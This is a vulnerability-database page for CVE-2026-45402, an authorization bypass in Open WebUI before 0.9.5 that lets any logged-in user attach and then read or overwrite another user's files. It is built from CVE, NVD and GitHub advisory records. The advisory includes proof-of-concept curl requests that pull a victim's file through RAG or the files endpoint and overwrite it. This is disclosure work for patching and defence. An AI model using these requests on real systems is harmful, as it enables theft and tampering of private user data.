CVE-2026-45402 (GCVE-0-2026-45402)

Vulnerability from cvelistv5 – Published: 2026-05-15 20:40 – Updated: 2026-05-19 03:55

Title

Open WebUI: Cross-User File Access via Unchecked file_id in Folder Knowledge and Knowledge-Base Attach Endpoints

Summary

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file's content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user's private file — and on the knowledge-base path, also to overwrite it — given knowledge of the file's UUID. This affects backend/open_webui/routers/folders.py (POST /api/v1/folders/{id}/update), backend/open_webui/routers/knowledge.py (add_file_to_knowledge_by_id), and backend/open_webui/routers/knowledge.py (add_files_to_knowledge_by_id_batch). This vulnerability is fixed in 0.9.5.

Severity ?

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CWE

CWE-639 - Authorization Bypass Through User-Controlled Key

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/open-webui/open-webui/security…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
open-webui	open-webui	Affected: < 0.9.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-45402",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-18T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-19T03:55:34.884Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "open-webui",
          "vendor": "open-webui",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.9.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file\u0027s content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user\u0027s private file \u2014 and on the knowledge-base path, also to overwrite it \u2014 given knowledge of the file\u0027s UUID. This affects backend/open_webui/routers/folders.py (POST /api/v1/folders/{id}/update), backend/open_webui/routers/knowledge.py (add_file_to_knowledge_by_id), and backend/open_webui/routers/knowledge.py (add_files_to_knowledge_by_id_batch). This vulnerability is fixed in 0.9.5."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-639",
              "description": "CWE-639: Authorization Bypass Through User-Controlled Key",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-15T20:40:04.617Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f"
        }
      ],
      "source": {
        "advisory": "GHSA-r472-mw7m-967f",
        "discovery": "UNKNOWN"
      },
      "title": "Open WebUI: Cross-User File Access via Unchecked file_id in Folder Knowledge and Knowledge-Base Attach Endpoints"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-45402",
    "datePublished": "2026-05-15T20:40:04.617Z",
    "dateReserved": "2026-05-12T01:48:40.451Z",
    "dateUpdated": "2026-05-19T03:55:34.884Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-45402",
      "date": "2026-05-24",
      "epss": "0.00012",
      "percentile": "0.01746"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-45402\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-15T21:16:38.273\",\"lastModified\":\"2026-05-18T19:53:25.020\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file\u0027s content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user\u0027s private file \u2014 and on the knowledge-base path, also to overwrite it \u2014 given knowledge of the file\u0027s UUID. This affects backend/open_webui/routers/folders.py (POST /api/v1/folders/{id}/update), backend/open_webui/routers/knowledge.py (add_file_to_knowledge_by_id), and backend/open_webui/routers/knowledge.py (add_files_to_knowledge_by_id_batch). This vulnerability is fixed in 0.9.5.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-639\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.9.5\",\"matchCriteriaId\":\"19F64B41-71DA-4E31-A040-1C351A537567\"}]}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-45402\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-15T22:17:20.739307Z\"}}}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-15T22:17:52.363Z\"}}], \"cna\": {\"title\": \"Open WebUI: Cross-User File Access via Unchecked file_id in Folder Knowledge and Knowledge-Base Attach Endpoints\", \"source\": {\"advisory\": \"GHSA-r472-mw7m-967f\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"open-webui\", \"product\": \"open-webui\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.9.5\"}]}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f\", \"name\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file\u0027s content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user\u0027s private file \\u2014 and on the knowledge-base path, also to overwrite it \\u2014 given knowledge of the file\u0027s UUID. This affects backend/open_webui/routers/folders.py (POST /api/v1/folders/{id}/update), backend/open_webui/routers/knowledge.py (add_file_to_knowledge_by_id), and backend/open_webui/routers/knowledge.py (add_files_to_knowledge_by_id_batch). This vulnerability is fixed in 0.9.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-639\", \"description\": \"CWE-639: Authorization Bypass Through User-Controlled Key\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-15T20:40:04.617Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-45402\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-19T03:55:34.884Z\", \"dateReserved\": \"2026-05-12T01:48:40.451Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-15T20:40:04.617Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-45402

Vulnerability from fkie_nvd - Published: 2026-05-15 21:16 - Updated: 2026-05-18 19:53

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f	Exploit, Mitigation, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	openwebui	open_webui	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "19F64B41-71DA-4E31-A040-1C351A537567",
              "versionEndExcluding": "0.9.5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file\u0027s content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user\u0027s private file \u2014 and on the knowledge-base path, also to overwrite it \u2014 given knowledge of the file\u0027s UUID. This affects backend/open_webui/routers/folders.py (POST /api/v1/folders/{id}/update), backend/open_webui/routers/knowledge.py (add_file_to_knowledge_by_id), and backend/open_webui/routers/knowledge.py (add_files_to_knowledge_by_id_batch). This vulnerability is fixed in 0.9.5."
    }
  ],
  "id": "CVE-2026-45402",
  "lastModified": "2026-05-18T19:53:25.020",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-15T21:16:38.273",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-639"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-R472-MW7M-967F

Vulnerability from github – Published: 2026-05-14 20:27 – Updated: 2026-05-15 23:55

Summary

Open WebUI: Cross-User File Access via Unchecked file_id in Folder Knowledge and Knowledge-Base Attach Endpoints

Details

Cross-User File Access via Unchecked file_id in Folder Knowledge and Knowledge-Base Attach Endpoints

Summary

Multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file's content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user's private file — and on the knowledge-base path, also to overwrite it — given knowledge of the file's UUID.

Affected code paths

Path 1 — Folder knowledge ingestion via `folders.update`

backend/open_webui/routers/folders.py:156 — POST /api/v1/folders/{id}/update accepts a FolderUpdateForm whose data: Optional[dict] field is written verbatim into the folder. The folder consumer at backend/open_webui/utils/middleware.py:2409 spreads folder.data['files'] directly into form_data['files'] for the next chat completion, which becomes RAG context. There is no per-file ownership check at the writer (the update handler) and no per-file ownership check at the reader (the middleware folder consumer) — only the folder list endpoint (folders.py:78-94) cleans up by stripping inaccessible files, and that runs lazily at folder-list time rather than at chat time. An attacker with a victim's file UUID can write data: {"files": [{"id": "<victim>", "type": "file"}]} into their own folder, immediately chat in that folder, and have the LLM return the victim's document content via RAG. The cleanup pass strips the file from persistence later, but the exfiltration has already happened.

Path 2 — Knowledge-base attach via `knowledge.{id}/file/add` and `knowledge.{id}/files/batch/add`

backend/open_webui/routers/knowledge.py:616-669 (add_file_to_knowledge_by_id) and backend/open_webui/routers/knowledge.py:972-1035 (add_files_to_knowledge_by_id_batch) check the caller's write access to the knowledge base but never validate the caller's access to the file_id being attached. Because has_access_to_file(..., user) returns True for any file linked to a KB the caller owns, attaching a victim's file_id to an attacker-owned KB silently unlocks read and write on that file through /api/v1/files/{id}/content and /api/v1/files/{id}/data/content/update. This is a stronger variant than Path 1 — full read AND overwrite, persisted, no cleanup pass to mitigate.

Proof of concept

Path 1 (folder knowledge)

# Attacker writes victim file_id into their own folder
curl -X POST http://target/api/v1/folders/<attacker_folder_id>/update \
  -H "Authorization: Bearer $ATK" -H "Content-Type: application/json" \
  -d "{\"data\": {\"files\": [{\"id\": \"$VICTIM_FILE_ID\", \"type\": \"file\"}]}}"

# Attacker chats in that folder — victim file becomes RAG context
curl -X POST http://target/api/chat/completions \
  -H "Authorization: Bearer $ATK" -H "Content-Type: application/json" \
  -d "{\"model\":\"any\",\"messages\":[{\"role\":\"user\",\"content\":\"summarise my uploaded document\"}],\"folder_id\":\"<attacker_folder_id>\"}"

Path 2 (knowledge-base attach)

# Attacker creates own KB
KB=$(curl -s -X POST http://target/api/v1/knowledge/create \
  -H "Authorization: Bearer $ATK" -H "Content-Type: application/json" \
  -d '{"name":"x","description":"x","data":{}}' | jq -r .id)

# Attach victim's file_id — no ownership check
curl -X POST http://target/api/v1/knowledge/$KB/file/add \
  -H "Authorization: Bearer $ATK" -H "Content-Type: application/json" \
  -d "{\"file_id\":\"$VICTIM_FILE_ID\"}"

# Read victim file through standard files endpoint (now accessible because file is "linked to KB I own")
curl http://target/api/v1/files/$VICTIM_FILE_ID/content -H "Authorization: Bearer $ATK"

# Overwrite
curl -X POST http://target/api/v1/files/$VICTIM_FILE_ID/data/content/update \
  -H "Authorization: Bearer $ATK" -H "Content-Type: application/json" \
  -d '{"content":"tampered"}'

Impact

Confidentiality: Any authenticated user can read the contents of any other user's private uploaded file, given knowledge of the file UUID. UUIDs are V4 (not enumerable in practice) but leak through normal usage — file IDs appear in chat sources, in shared chats' citations, in URL paths (/workspace/files/), in browser history / referrer headers, and in any export/share flow that surfaces source metadata.
Integrity: Path 2 (knowledge attach) additionally allows the attacker to overwrite the victim's file content, persisting attacker-controlled text under the victim's file_id. Subsequent reads by the victim or by any RAG flow that ingests the victim's file return the tampered content.
Availability: None directly — file rows are not deleted by these paths.

Recommended fix

Validate the supplied file_id against the caller's read access before attaching, in every writer.

Credits

Per the consolidation rule in SECURITY.md, credit goes only to reporters who FIRST identified a distinct sub-path that no earlier filing covered.

MrBeard-FT — first to identify the folder-knowledge ingestion path (Path 1) Classic298 — first to identify the knowledge-base attach path (Path 2 — /knowledge/{id}/file/add and /files/batch/add)

Severity ?

8.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.9.4"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45402"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:27:35Z",
    "nvd_published_at": "2026-05-15T21:16:38Z",
    "severity": "HIGH"
  },
  "details": "# Cross-User File Access via Unchecked file_id in Folder Knowledge and Knowledge-Base Attach Endpoints\n\n## Summary\n\nMultiple endpoints accept a user-supplied `file_id` and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file\u0027s content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user\u0027s private file \u2014 and on the knowledge-base path, also to overwrite it \u2014 given knowledge of the file\u0027s UUID.\n\n## Affected code paths\n\n### Path 1 \u2014 Folder knowledge ingestion via `folders.update`\n\n`backend/open_webui/routers/folders.py:156` \u2014 `POST /api/v1/folders/{id}/update` accepts a `FolderUpdateForm` whose `data: Optional[dict]` field is written verbatim into the folder. The folder consumer at `backend/open_webui/utils/middleware.py:2409` spreads `folder.data[\u0027files\u0027]` directly into `form_data[\u0027files\u0027]` for the next chat completion, which becomes RAG context. There is no per-file ownership check at the writer (the update handler) and no per-file ownership check at the reader (the middleware folder consumer) \u2014 only the *folder list* endpoint (`folders.py:78-94`) cleans up by stripping inaccessible files, and that runs lazily at folder-list time rather than at chat time. An attacker with a victim\u0027s file UUID can write `data: {\"files\": [{\"id\": \"\u003cvictim\u003e\", \"type\": \"file\"}]}` into their own folder, immediately chat in that folder, and have the LLM return the victim\u0027s document content via RAG. The cleanup pass strips the file from persistence later, but the exfiltration has already happened.\n\n### Path 2 \u2014 Knowledge-base attach via `knowledge.{id}/file/add` and `knowledge.{id}/files/batch/add`\n\n`backend/open_webui/routers/knowledge.py:616-669` (`add_file_to_knowledge_by_id`) and `backend/open_webui/routers/knowledge.py:972-1035` (`add_files_to_knowledge_by_id_batch`) check the caller\u0027s *write access to the knowledge base* but never validate the caller\u0027s access to the `file_id` being attached. Because `has_access_to_file(..., user)` returns True for any file linked to a KB the caller owns, attaching a victim\u0027s `file_id` to an attacker-owned KB silently unlocks read **and** write on that file through `/api/v1/files/{id}/content` and `/api/v1/files/{id}/data/content/update`. This is a stronger variant than Path 1 \u2014 full read AND overwrite, persisted, no cleanup pass to mitigate.\n\n## Proof of concept\n\n### Path 1 (folder knowledge)\n```bash\n# Attacker writes victim file_id into their own folder\ncurl -X POST http://target/api/v1/folders/\u003cattacker_folder_id\u003e/update \\\n  -H \"Authorization: Bearer $ATK\" -H \"Content-Type: application/json\" \\\n  -d \"{\\\"data\\\": {\\\"files\\\": [{\\\"id\\\": \\\"$VICTIM_FILE_ID\\\", \\\"type\\\": \\\"file\\\"}]}}\"\n\n# Attacker chats in that folder \u2014 victim file becomes RAG context\ncurl -X POST http://target/api/chat/completions \\\n  -H \"Authorization: Bearer $ATK\" -H \"Content-Type: application/json\" \\\n  -d \"{\\\"model\\\":\\\"any\\\",\\\"messages\\\":[{\\\"role\\\":\\\"user\\\",\\\"content\\\":\\\"summarise my uploaded document\\\"}],\\\"folder_id\\\":\\\"\u003cattacker_folder_id\u003e\\\"}\"\n```\n  \n### Path 2 (knowledge-base attach)\n\n```\n# Attacker creates own KB\nKB=$(curl -s -X POST http://target/api/v1/knowledge/create \\\n  -H \"Authorization: Bearer $ATK\" -H \"Content-Type: application/json\" \\\n  -d \u0027{\"name\":\"x\",\"description\":\"x\",\"data\":{}}\u0027 | jq -r .id)\n\n# Attach victim\u0027s file_id \u2014 no ownership check\ncurl -X POST http://target/api/v1/knowledge/$KB/file/add \\\n  -H \"Authorization: Bearer $ATK\" -H \"Content-Type: application/json\" \\\n  -d \"{\\\"file_id\\\":\\\"$VICTIM_FILE_ID\\\"}\"\n\n# Read victim file through standard files endpoint (now accessible because file is \"linked to KB I own\")\ncurl http://target/api/v1/files/$VICTIM_FILE_ID/content -H \"Authorization: Bearer $ATK\"\n\n# Overwrite\ncurl -X POST http://target/api/v1/files/$VICTIM_FILE_ID/data/content/update \\\n  -H \"Authorization: Bearer $ATK\" -H \"Content-Type: application/json\" \\\n  -d \u0027{\"content\":\"tampered\"}\u0027\n```\n\n## Impact\n\n- Confidentiality: Any authenticated user can read the contents of any other user\u0027s private uploaded file, given knowledge of the file UUID. UUIDs are V4 (not enumerable in practice) but leak through normal usage \u2014 file IDs appear in chat sources, in shared chats\u0027 citations, in URL paths (/workspace/files/\u003cid\u003e), in browser history / referrer headers, and in any export/share flow that surfaces source metadata.\n- Integrity: Path 2 (knowledge attach) additionally allows the attacker to overwrite the victim\u0027s file content, persisting attacker-controlled text under the victim\u0027s file_id. Subsequent reads by the victim or by any RAG flow that ingests the victim\u0027s file return the tampered content.\n- Availability: None directly \u2014 file rows are not deleted by these paths.\n\n## Recommended fix\n\nValidate the supplied file_id against the caller\u0027s read access before attaching, in every writer.\n\n### Credits\n\nPer the consolidation rule in SECURITY.md, credit goes only to reporters who FIRST identified a distinct sub-path that no earlier filing covered.\n\nMrBeard-FT \u2014 first to identify the folder-knowledge ingestion path (Path 1)\nClassic298 \u2014 first to identify the knowledge-base attach path (Path 2 \u2014 /knowledge/{id}/file/add and /files/batch/add)",
  "id": "GHSA-r472-mw7m-967f",
  "modified": "2026-05-15T23:55:40Z",
  "published": "2026-05-14T20:27:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45402"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI: Cross-User File Access via Unchecked file_id in Folder Knowledge and Knowledge-Base Attach Endpoints"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-45402 (GCVE-0-2026-45402)

FKIE_CVE-2026-45402

GHSA-R472-MW7M-967F

Cross-User File Access via Unchecked file_id in Folder Knowledge and Knowledge-Base Attach Endpoints

Summary

Affected code paths

Path 1 — Folder knowledge ingestion via folders.update

Path 2 — Knowledge-base attach via knowledge.{id}/file/add and knowledge.{id}/files/batch/add

Proof of concept

Path 1 (folder knowledge)

Path 2 (knowledge-base attach)

Impact

Recommended fix

Credits

Tags

Sightings

Nomenclature

Path 1 — Folder knowledge ingestion via `folders.update`

Path 2 — Knowledge-base attach via `knowledge.{id}/file/add` and `knowledge.{id}/files/batch/add`